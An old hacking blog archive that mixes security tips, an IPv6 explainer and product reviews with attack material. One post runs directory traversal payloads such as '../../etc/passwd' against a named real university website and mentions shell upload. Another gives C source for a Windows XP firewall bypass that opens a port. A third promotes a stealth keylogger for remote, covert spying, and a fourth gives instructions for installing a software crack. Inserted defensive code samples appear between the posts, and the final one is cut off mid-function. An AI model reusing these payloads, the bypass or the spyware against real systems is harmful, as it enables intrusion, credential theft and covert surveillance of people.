Monday, June 27, 2011

How to protect your email account password from hackers


Hello friends, I am going to share how to protect your email account password from hackers. This is a complete guide to protecting yourself from being hacked and keeping your personal information from being leaked or used by anybody online. This guide will also help you learn several of the latest techniques that hackers use to hack email accounts and passwords. So let's discuss how to protect your email account passwords from getting hacked. It's a must-read post for all online users who use email and social networking websites.
As the saying goes, "Prevention is better than cure." So you should know how to protect yourself rather than trying to recover after falling prey to these hacking attacks.



Complete Guide to prevent your Email Passwords from Hackers:
1. Don't use the links in an email, instant message, or chat to get to any web page if you suspect the message might not be authentic or you don't know the sender or user's handle. Instead, call the company on the telephone, or log onto the website directly by typing in the Web address in your browser.
2. Avoid filling out forms in email messages that ask for personal financial information.
3. You should only communicate information such as credit card numbers or account information via a secure website or the telephone. Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.
 
  • Phishers are now able to 'spoof,' or forge BOTH the "https://" that you normally see when you're on a secure Web server AND a legitimate-looking address. You may even see both in the link of a spam email. Again, make it a habit to enter the address of any banking, shopping, auction, or financial transaction website yourself and not depend on displayed links.  
  • Phishers may also forge the yellow lock you would normally see near the bottom of your screen on a secure site. The lock has usually been considered as another indicator that you are on a 'safe' site. The lock, when double-clicked, displays the security certificate for the site. If you get any warnings displayed that the address of the site you have displayed does NOT match the certificate, do not continue. 
  • Remember not all spam sites will try to show the "https://" and/or the security lock. Get in the habit of looking at the address line, too. Were you directed to PayPal? Does the address line display something different like "http://www.gotyouscammed.com/paypal/login.htm?" Be aware of where you are going.

4. Consider installing a Web browser toolbar to help protect you from known fraudulent websites. These toolbars match where you are going with lists of known phisher websites and will alert you. The newer versions of Internet Explorer (version 7 or 8 beta) include this toolbar, as does Firefox version 4.xx or 5 beta.
5. Regularly log into your online accounts. Don't leave it for as long as a month before you check each account.

6. Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate (or legal) and done by you or in your supervision. If anything is suspicious or you don't recognize the transaction, contact your bank and all card issuers.
 
7. Ensure that your browser is up to date and security patches applied.

8. Never download anything from anonymous links or links in emails or chat boxes.

9. Always avoid downloading cracks, keygens and patches, as most of these contain Trojans and malware that will leak your personal data to hackers.

10. Regularly update your antivirus and anti-spyware software so that all new viruses are detectable and can be repaired easily.

11. While installing freeware, always take precautions and don't install the additional software it recommends. Install only those things that you know or that might be useful to you. And never install toolbars, as their code is dynamic, which means they can be used to steal your private data such as credit card details, email account information and other personal data such as your search patterns and your computer event logs.
  
  
A few more important things that you should always remember:

Always report "phishing" or “spoofed” e-mails to the following groups:
  • forward the email to reportphishing@antiphishing.org
  • forward the email to the Federal Trade Commission at spam@uce.gov
  • forward the email to the "abuse" email address at the company that is being spoofed (e.g. "spoof@ebay.com")
  • when forwarding spoofed messages, always include the entire original email with its original header information intact
  • notify The Internet Crime Complaint Center of the FBI by filing a complaint on their website: www.ic3.gov

Some Tips while choosing your Passwords:
  • Choose a complex password. If you use a simple password such as "password" or "rockstar" or any dictionary word, it makes it easy for people to guess your password. This is especially true if your potential hackers are friends and family members who might try to guess. Instead, choose a password that makes use of both capital and lower case letters, numbers and special characters like the percent or dollar sign.
  • Change your password regularly. Every month, make a point of changing your password to a new complex one.

Article source: isoftdl.com

Thursday, June 23, 2011

5 phases of Web Application attack - A HackingAlert Exclusive research!




Web applications are now the next big victim after games for hackers.
Recent research shows that 70% of vulnerabilities exist at the top layer of the web application.
Attackers use several techniques to hack web applications. I have been constantly monitoring different types of web attacks involving different methods, but there are some common steps which all hackers follow in order to perform their attack on applications. I am presenting a 5 phase method which covers everything from gaining information to maintaining the attack on the application. You can also read one of the most popular articles of this blog - How to hack a website/web server - a 3 step guide.




Phase 1: Silent reconnaissance
The attacker gathers as much information as possible, identifying potentially vulnerable areas of the application. This is done discreetly using tools such as Web debugging proxies to monitor the traffic between the browser and the Web server. The attacker traverses the site, much like a normal user, while collecting valuable information about how the application works. This activity goes undetected, because as far as the server is concerned, it represents the traffic of a legitimate user.
At this point, the attacker will stop interacting with the target server directly. The attacker will spend significant time reviewing the data collected by the debugging proxy and extracting useful facts about the environment. This may include the type of hardware and software in the network architecture, programming languages, libraries, source code and comments. This information will be leveraged during the later phases of the attack.



Phase 2: Attack vector establishment

This phase begins once the attacker has gained an understanding of the application design and the breadth of its attack surface. Until now, the interaction with the server has been fairly benign and undetectable, but in the next phase, things get a little louder. For this reason, the attacker will often start using an anonymous proxy to interact with the server.
The attacker may also employ other protective measures such as browser privacy controls, firewalls, antivirus and virtual machines. Once the attacker is confident that his traffic can no longer be traced, the real work can start.
With notes in hand, and a debugging proxy up and running, the attacker starts to seek out dynamic pages, especially those which accept form or query input. The attacker will then determine what the various input parameters are, and attempt to derive boundary cases for them. Boundary case values are sent to the application to provoke an unintended response from the server.

The attacker repeats this activity on all dynamic pages that he is aware of. When finished, he has a list of all the parameters that are correctly validated by the server, and more important, the parameters that are vulnerable -- they produce calculation errors, fatal errors, or are blindly injected into the response without encoding or cleansing.
The attacker tailors the boundary cases so they do not match any known attack signatures, so this activity is almost always imperceptible to server administrators. The attacker still has to remain anonymous, because many applications keep track of errors and record the addresses of the clients responsible for generating them. Because of this, administrators could discover the activity later by inspecting logs with a security tool. However, this is typically long after the attacker has moved on to the next phase.
If the attacker was able to obtain a large number of potentially vulnerable inputs, the next step is to start testing each one to see if an attack vector is possible. For example, if the attacker received an SQL error when submitting a value of "my'username" in a login form, then there is probably an SQL injection vulnerability. The attacker will start supplying more structured SQL syntax into the input in an effort to shape the resulting error.
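
The log inspection mentioned above can be sketched as follows. This is an added example, not part of the original article: it reports clients that caused server errors on several different parameters that work in normal use. The log lines are constructed, and the common log format, the addresses and the `min_params` threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format, documentation addresses).
# Only query-string parameters are visible here; parameters sent in POST
# bodies would have to come from application-level error logs instead.
SAMPLE_LOG = """\
198.51.100.20 - - [23/Jun/2011:09:58:11 +0000] "GET /item.php?id=12 HTTP/1.1" 200 5120
198.51.100.20 - - [23/Jun/2011:09:58:40 +0000] "GET /profile.php?uid=7 HTTP/1.1" 200 2210
198.51.100.20 - - [23/Jun/2011:09:59:02 +0000] "GET /login.php?user=alice HTTP/1.1" 302 0
198.51.100.20 - - [23/Jun/2011:09:59:30 +0000] "GET /report.php?month=6 HTTP/1.1" 500 310
203.0.113.7 - - [23/Jun/2011:10:01:02 +0000] "GET /item.php?id=12 HTTP/1.1" 200 5120
203.0.113.7 - - [23/Jun/2011:10:01:09 +0000] "GET /item.php?id=99999999999999999999 HTTP/1.1" 500 310
203.0.113.7 - - [23/Jun/2011:10:01:15 +0000] "GET /profile.php?uid=abc HTTP/1.1" 500 310
203.0.113.7 - - [23/Jun/2011:10:01:21 +0000] "GET /login.php?user=my%27username HTTP/1.1" 500 310
203.0.113.7 - - [23/Jun/2011:10:01:30 +0000] "GET /report.php?month=6 HTTP/1.1" 500 310
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (client, path, [query parameter names], status) or None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    names = [name for name, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return m.group("client"), parts.path, names, int(m.group("status"))


def probing_clients(log_text, min_params=3):
    """Map client -> parameters that failed for it but work in normal use.

    min_params is a hypothetical threshold: the number of distinct
    value-dependent failures one client must cause before it is reported.
    """
    records = [r for r in map(parse_line, log_text.splitlines()) if r]

    # Parameters seen on a successful response from anyone: the page works.
    works = {(path, name) for _, path, names, status in records
             if status < 400 for name in names}

    # Parameters each client saw fail with a server error.
    failed = defaultdict(set)
    for client, path, names, status in records:
        if status >= 500:
            failed[client].update((path, name) for name in names)

    report = {}
    for client, pairs in failed.items():
        # Drop pages that never succeed for anyone: broken, not probed.
        value_dependent = sorted(pairs & works)
        if len(value_dependent) >= min_params:
            report[client] = [f"{path}?{name}" for path, name in value_dependent]
    return report


if __name__ == "__main__":
    for client, params in probing_clients(SAMPLE_LOG).items():
        print(client, "->", ", ".join(params))
```

Because the check keys on error responses rather than on request content, it does not depend on the values matching any attack signature.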



Phase 3: Implementation

This phase begins once the attacker has identified the vulnerabilities and their associated attack vectors. This is where the real damage starts. The scope of damage depends on the types of vulnerabilities that are exploited. For example:

• The attacker starts to mine the database for sensitive information, delete existing information, or insert new fraudulent information.

• The attacker seeds the application with malicious code by way of XSS vulnerabilities and reflected parameters.

• The attacker designs complex phishing scams that use the vulnerabilities to give the scam credibility.

The possibilities are only constrained by the potential vectors, and how they can be chained together to deliver more powerful payloads. Most of the damage has been done at this point.



Phase 4: Automation

Attacks such as input parameter abuse are often single request vectors. This means the damage happens within a single HTTP request. Sometimes, however, the execution of an attack vector provides incremental benefits each time it is performed. Generally, if the attack vector generates revenue for the attacker, the next step is to automate the attack. This enables the attacker to repeat the attack vector over and over again, multiplying the overall monetary gain.
Because the attacker must still cover his tracks in order to execute the automated attack, he will generally code the attack into a remotely controlled bot. This tactic poses serious challenges for the administrator, because even if the attack is identified, an IP-based block will no longer be sufficient. To accomplish this, attackers will often use a prefabricated "command and control" kit that allows them to quickly raise and command a bot army.


Phase 5: Maintenance

Finally the attack is complete. The hacker has extracted as much data as his experience and skill allows. He will go off and work on other projects until his automated bots start to fail. This will signal that some fundamental vulnerability in the attack vector has been patched or modified. If the attacker cares enough, he may repeat the entire process over again, focusing on the parts of the application that are essential for the bots' proper functioning. He will find a workaround for the new patch, create an entirely new attack vector, or move to a different target altogether.

These phases clearly encompass all the techniques involved in penetrating a web application. The difficulty of the attack can vary according to the sophistication of the application.

Monday, June 20, 2011

Free WinRar Password Recovery

Today I am going to discuss the awesome Zip Password Recovery Magic v6.1.1.169, which can easily crack zip passwords. It provides brute-force and dictionary cracking methods, and you can pause and resume a recovery job easily. All you need to do to recover your password is add your file to the operation window.


Free Download Zip Password Recovery Magic


How to install Zip password Recovery Magic v6.1.1.169 ?

1. Extract RAR.PW.Remover to your computer and install as normal


2. Go to the crack folder and copy the File Named “urpwdr11rc16.exe” , then go to the hard drive where You Installed the Program , default folder is Program Files/Intelore” Folder/RAR-PR. Then paste the copied crack file into this directory and accept all permission requests!



Saturday, June 18, 2011

Perfect Keylogger



 Perfect Keylogger is a new generation keylogger which is absolutely undetectable. Complex internal mechanisms are hidden from the user behind the friendly interface. Perfect Keylogger is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list. Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger has unique remote installation feature. You can attach keylogger to any other program and send it by e-mail to install on the remote PC in the stealth mode. Then it will send keystrokes, screenshots and websites visited to you by e-mail or FTP. 
You don't have to worry about the firewall alerts - now our keylogger can be invisible for the firewall program. Our keylogger supports remote installation, update and removal - no physical access required!
New Smart Rename feature lets you rename all keylogger's executable files and registry entries using one keyword! One of the most powerful features of Perfect Keylogger is its advanced Keyword Detection and Notification. Create a list of "on alert" words or phrases and keylogger will continually monitor keyboard typing, URLs and web pages for these words or phrases.
Features: 
• Has an intuitive interface and very easy to use, even for beginners   
• Absolutely invisible mode    
• Remote Installation / Update / Uninstallation     
• Logs texts and passwords typed in the every application, including popular instant messengers   
• Supports virtually all input languages (Unicode engine), including Japanese, Arabian, Thai, Chinese! (v.1.65)     
• Visual surveillance (screenshots)     
• Slide show for screenshots     
• Captures the passwords behind the asterisks     
• Captures button clicks     
• Captures screen information on every mouse click     
• Logs websites visited     
• Captures ICQ, Miranda, Skype, Google Talk, MSN, AIM, AOL, Yahoo, QIP chats!
• Keyword Detection and Notification     
• Records contents of password protected web pages, including Web Mail messages (using our additional software)    
• Monitors Windows Clipboard     
• Sends log by e-mail (in the stealth mode)    
• Sends screenshots by e-mail (in the stealth mode)     
• Uploads ALL logs into the separate folders by FTP (in the stealth mode)!     
• Supports renaming of the keylogger's files and registry entries     
• Monitors computer activity only when user goes online (option)     
• Can be invisible for the firewall program     
• Invisible in the Windows startup list     
• Monitors all users of the PC, even if you don't know their passwords     
• User friendly HTML file format for emailed logs     
• Invisible in Windows NT/2000/XP/Vista Task Manager and Windows 9.x/Me Task List   
• Records Windows 9.x/Me logon passwords     
• Records Windows 2000/XP logon passwords (using our additional software)    
• "Quick Install" - configure keylogger on your PC, then just run it on another PC to install     
• Intercepts DOS-box and Java-chat keystrokes    
• Installation packet fits into 3.5" floppy   
• Supports international keyboards   
• External log viewer   
• Supports printing of the log     
• Optimized for Windows XP/Vista    
• Strong encryption of the log file   
• Records keystrokes in the specified applications   
• Exports log to HTML
Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7

Thursday, June 16, 2011

Hack Google Searching




Songs
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER ARTIST OR SONG NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
E-book
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book name:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Image
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Movie
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Application
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER app NAME(CREATED BY 5ury4',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+zip+OR+rar+OR+exe+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Just copy a line starting from javascript:, paste it into your address bar, enter the details and enjoy!

Tuesday, June 14, 2011

Secure webmail encryption service eCrypt.me


When it comes to sending encrypted email messages, the easiest way to do it is by using a webmail service that supports it. With email encryption working in the background, you do not have to worry about digital certificates and PGP encryption keys, and everyone can use it with zero knowledge about encryption; the responsibility for keeping the messages secure lies with the provider and not the user.
With eCrypt.me you can send messages just like you would with any other webmail service, but its end-to-end encryption makes it impossible for others to read them. eCrypt.me doesn’t have as many features as Gmail, Hotmail and Yahoo have; it appears to have been designed with businesses in mind, maximizing employee productivity and making it very easy to use with a zero training curve. It doesn’t use Java like Hushmail does, its email interface loads quickly, and it is simple and easy to use. The communication between eCrypt.me and your browser is secured via SSL with a Verisign digital certificate using AES256 encryption.
eCrypt.me encrypted webmail service
Registering an account with eCrypt.me requires a valid email address at which to receive an activation email. Check the spam folder, because that is where it went in my case. The service allows you to use your own email as the username to log in. In order for someone to communicate with you using end-to-end encryption, they will need to have an account with eCrypt.me. This happens with all other webmail services using encryption, and it is the biggest drawback of this kind of service: both sides have to use the same service for encryption to take place.
eCrypt.me has a FileVault where you can upload files for storage. The files (photos, PDFs, etc.) cannot be viewed in your browser; it just makes it easy to send encrypted attachments by selecting them from the FileVault when you compose an email. There is an account activity log that tells you the last login IP; this log can be exported as CSV, Excel and XML. A basic statistics screen tells you the mailbox and bandwidth usage. The security settings have two basic choices: encrypting email subjects and password timeout settings.
Overall this is a very simple webmail service. If you like easy-to-use, no-nonsense webmail with encryption that is useful for sending email and nothing else, you will feel at home. I would consider this webmail service if I had a business with high employee turnover, because I would not have to train people on how to send encrypted email, and employees can’t waste their time in messengers and other non-work-related features that some email services have.
This encrypted webmail service is still in beta release. At the moment it is free to use; I doubt it will be once it comes out of beta, because someone needs to pay the bills.

Sunday, June 12, 2011

Hack a website using Directory Traversal attack?


What is the root directory of a web server?

It is a specific directory on the server in which the web content is placed and can be seen by website visitors. Directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible to a visitor on a website is placed in the root directory. The visitor cannot step out of the root directory.

What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, we are at the location C:\xx\yy\zz. On typing ..\ , we would reach C:\xx\yy.

Again on typing ..\ , we would reach C:\xx.

Let's again go to location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is, to directory xx) where abc.txt is placed.

Note: It's ..\ on Windows and ../ on UNIX-like operating systems.

What is a Directory Traversal attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website vulnerable to directory traversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This web server is running on a UNIX-like operating system. There is a directory 'etc' on Unix/Linux which contains configuration files of programs that run on the system. Some of the files placed in the 'etc' directory are passwd, shadow, profile and sbin.

The file etc/passwd contains the login names of users and even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Look carefully at the position of the directories placed on the web server.

We do not know the actual names and contents of the directories except 'etc', which is the default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the web pages of the website.


Let's type this in the URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search for the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing.

Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E) and look for 'etc', but again it will return nothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we go for this URL
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to the 'etc' directory, and shows us the contents of the 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view etc/profile, etc/services and many other files, like backup files, which may contain sensitive data. Some files like etc/shadow may not be accessible because they are accessible only by privileged users.

Note: If proc/self/environ is accessible, you might upload a shell on the server, which is called Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input
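
One way to apply countermeasure 2, shown as an added example that is not from the original post: the requested page is resolved to its real location and rejected unless it is a file inside the pages directory. The directory layout, file contents and function names are constructed for the demonstration, and the placeholder 'etc/passwd' is created in a temporary directory.

```python
import os
import tempfile


class RejectedPath(ValueError):
    """The requested page does not resolve to a file inside the pages directory."""


def build_demo_tree():
    """Constructed layout: <base>/site/pages holds the includable pages and
    <base>/etc/passwd stands in for a sensitive file outside the web root."""
    base = tempfile.mkdtemp(prefix="traversal_demo_")
    pages = os.path.join(base, "site", "pages")
    os.makedirs(pages)
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(pages, "notification.php"), "w") as fh:
        fh.write("notice")
    with open(os.path.join(base, "etc", "passwd"), "w") as fh:
        fh.write("constructed placeholder")
    return base, pages


def include_unsafe(pages_dir, page):
    """The 'before': the request parameter is joined to the directory as-is,
    so every ../ in it climbs one level out of pages_dir."""
    with open(os.path.join(pages_dir, page)) as fh:
        return fh.read()


def resolve_page(pages_dir, page):
    """Return the real path of `page`, or raise RejectedPath."""
    if not page or "\x00" in page:
        raise RejectedPath("empty name or NUL byte")
    root = os.path.realpath(pages_dir)
    # realpath collapses ../ sequences and follows symlinks, so the check
    # below is made on the file that would actually be opened. An absolute
    # `page` replaces root in the join and is caught by the same check.
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        raise RejectedPath("resolves outside the pages directory")
    if not os.path.isfile(candidate):
        raise RejectedPath("no such page")
    return candidate


def include_safe(pages_dir, page):
    """The 'after': only files that resolve inside pages_dir are read."""
    with open(resolve_page(pages_dir, page)) as fh:
        return fh.read()


if __name__ == "__main__":
    base, pages = build_demo_tree()
    for requested in ("notification.php", "../../etc/passwd"):
        try:
            print(requested, "->", include_safe(pages, requested))
        except RejectedPath as exc:
            print(requested, "-> rejected:", exc)
```

Where the set of pages is known in advance, comparing the parameter against a fixed list of page names is stricter still.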

Prevent identity theft and fraud with Identity Finder


With hard disks getting bigger and thousands of files on our computers, it is easy to leave behind personal data that could be used for identity theft. Identity Finder stops the risk of data leakage by finding and securing private information. It would be a good idea to run something like this on your hard disk before taking your laptop to the repair shop or allowing anyone who is not your family access to your computer.
Identity Finder will scan your computer files searching for credit card numbers, dates of birth, passwords, bank account numbers, driver's license numbers, phone numbers and other personal data that is often used by identity thieves. It can also be used to search for country-specific data like Canadian SIN numbers, British NHS identification and Australian TFN account numbers.
After the scan, the software will show you all of the data it has found in a detailed preview pane with statistics, and it will offer to securely wipe it using US Department of Defense standards (DOD 5220.22-M). Any wrongly classified data can be filtered out from future scans by marking it as ignored. If you need to keep the data on your computer, you don’t necessarily have to erase it and can use Identity Finder to encrypt it. The application integrates with Windows Explorer, creating context menu options for easy access.
Some of the locations that will be scanned for sensitive data include the Internet browser temporary files (IE and Firefox), cookies, messenger logs, text documents (.docx, .pdf, .txt, .rtf, .html), compressed files (.zip, .gzip, .rar, .bzip), email messages (Windows Mail, Thunderbird, Outlook Express) and others.
Identity Finder to stop credit card fraud
Identity Finder contains all of the tools that are needed by those not using full disk encryption: a secure data wiper, file encryption and a password manager, with the icing on the cake being the hard disk scanning for unsecured data useful to identity thieves. The free edition of this software is pretty basic; it comes with a data shredder and it only scans for credit card numbers and passwords. If you want the whole suite with all of the features you will have to buy it.

Wednesday, June 8, 2011

Difference between IPv4 and IPv6


For a long time there has been much debate about changing from IPv4 to IPv6. But what are IPv4 and IPv6, what is the difference between them, and why is it necessary to change from IPv4 to IPv6? In this post we will discuss all of these in a simple manner (at least I will try to be simple).

What is an IP

IP is the short form of Internet Protocol. Put simply, IP is a set of technical rules which define how computers should communicate over a network. IP has a task to do, i.e. to deliver datagrams from the source host to the destination host based on their addresses. These addresses are called IP (Internet Protocol) addresses. Currently there are two versions, i.e. IP version 4 (IPv4) and IP version 6 (IPv6).

What are IPv4 and IPv6

IPv4 is the short form of Internet Protocol Version 4. IPv4 is the first version of Internet Protocol, which is widely used now and was deployed in 1981.
IPv6 is the short form of Internet Protocol Version 6. IPv6 is the newer version of Internet Protocol, which is already in use (less than 1% use it), is more sophisticated than IPv4 and has a larger address pool. IPv6 was deployed in 1999.

Difference Between IPv4 and IPv6

When it comes to the differences between them, there are some major ones which we should notice, and after reading these differences you would say that IPv6 is better than IPv4.
1) IPv4 and IPv6 were deployed in 1981 and 1999 respectively.
2) IPv4 has an address size of 32 bits, so the number of IP addresses is limited to 2^32, which is about 4 billion IPv4 addresses; if you want to be exact, there are 4,294,967,296 IPv4 addresses.
IPv6, on the other hand, has an address size of 128 bits, which means that the number of IPv6 addresses is equal to 2^128, or approximately 340 undecillion, or 3.4×10^38. To be exact, there are 340,282,366,920,938,463,463,374,607,431,768,211,456 IPv6 addresses.
3) An IPv4 address uses dot-decimal notation, e.g. 195.165.252.75, but an IPv6 address uses hexadecimal, colon-separated notation, e.g. 3FFF:2030:0535:AB0D:2125:4567:8902:ABDC.
4) An IPv4 address has a prefix notation like this: 195.165.0.0/24, but an IPv6 address has a prefix notation like this: 3FFF:2030:0535::/48.
5) When compared to IPv4, IPv6 can make the router's task simpler.
6) IPv6 allows bigger payloads when compared to IPv4.
7) As you can see from above (point 1), IPv6 has more usable addresses when compared to IPv4, which has only 4 billion addresses.
8) IPv6 is far better suited for mobile networks when compared to IPv4.
Not only these, but there are many other major and important differences and features in IPv6.

Why is it necessary to shift from IPv4 to IPv6

This is the first major question you get, right? Here is the famous answer. As said before, IPv4 has 4 billion addresses, and no doubt this was a large number when it was first deployed, but we all know that the internet is growing bigger and bigger, and so is the number of IP addresses in use, which in turn fills up the 4 billion address space. So there is no other way but to shift to IPv6, which has a larger number of addresses and more capabilities.
Meanwhile you can test your IPv6 compatibility here at http://www.test-ipv6.com. I did the test on my college computer and it is incompatible :( but my home system is compatible :(

My  lap are in compatible.
So, this is it. Do share your views, comments, and knowledge here by commenting. As I said before, I tried to be simple in this post, so if you think that I missed any important point, please tell me through your comments.

Monday, June 6, 2011

How to Bypass Windows XP Firewall using C program.

Hello friends, today I will share with you a technique with which we can bypass the Windows XP Service Pack 2 firewall. It's a 100% working hack and it's basically an exploit in Windows XP.
This technique is nothing but a vulnerability found in the Windows XP SP2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a firewall. Direct access to the firewall's registry keys allows local attackers to bypass the firewall blocking list and allows a malicious program to connect to the network.


Vulnerable Systems :-
* Microsoft Windows XP SP2
The Windows XP SP2 firewall keeps a list of allowed programs in the registry, which is not properly protected from modification by a malicious local attacker. If an attacker adds a new key to the registry address of
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
the attacker can enable his malware or Trojan to connect to the Internet without the firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-
#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h" 
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
 
struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...
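
For defenders, the same registry list can be audited for entries like the one above. The following is an added example, not part of the original post: it parses the text of a registry export of the AuthorizedApplications\List key and reports enabled entries that a simple policy would question. The export content is constructed, and the trusted-directory list and the rules are assumptions.

```python
import re

LIST_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
            r"\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List")

# Hypothetical policy: executables are only expected under these directories.
# Environment variables such as %windir% are not expanded by this sketch.
TRUSTED_DIRS = ("C:\\Program Files\\", "C:\\Windows\\")

# Constructed .reg export text; backslashes are doubled as in real exports.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Program Files\\ExampleApp\\app.exe"="C:\\Program Files\\ExampleApp\\app.exe:LocalSubNet:Enabled:Example App"
"C:\\chat.exe"="C:\\chat.exe:*:Enabled:chat"
"C:\\Temp\\old.exe"="C:\\Temp\\old.exe:*:Disabled:old tool"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"2001:TCP"="2001:TCP:*:Enabled:constructed port entry"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape(text):
    """Undo .reg string escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", text)


def parse_entries(reg_text):
    """Return (value_name, fields) for each string value under LIST_KEY.

    The data has the form path:scope:status:label. The path itself contains
    a colon (C:\\...), so the split is made from the right.
    """
    entries, in_list = [], False
    for raw in reg_text.splitlines():
        line = raw.strip()
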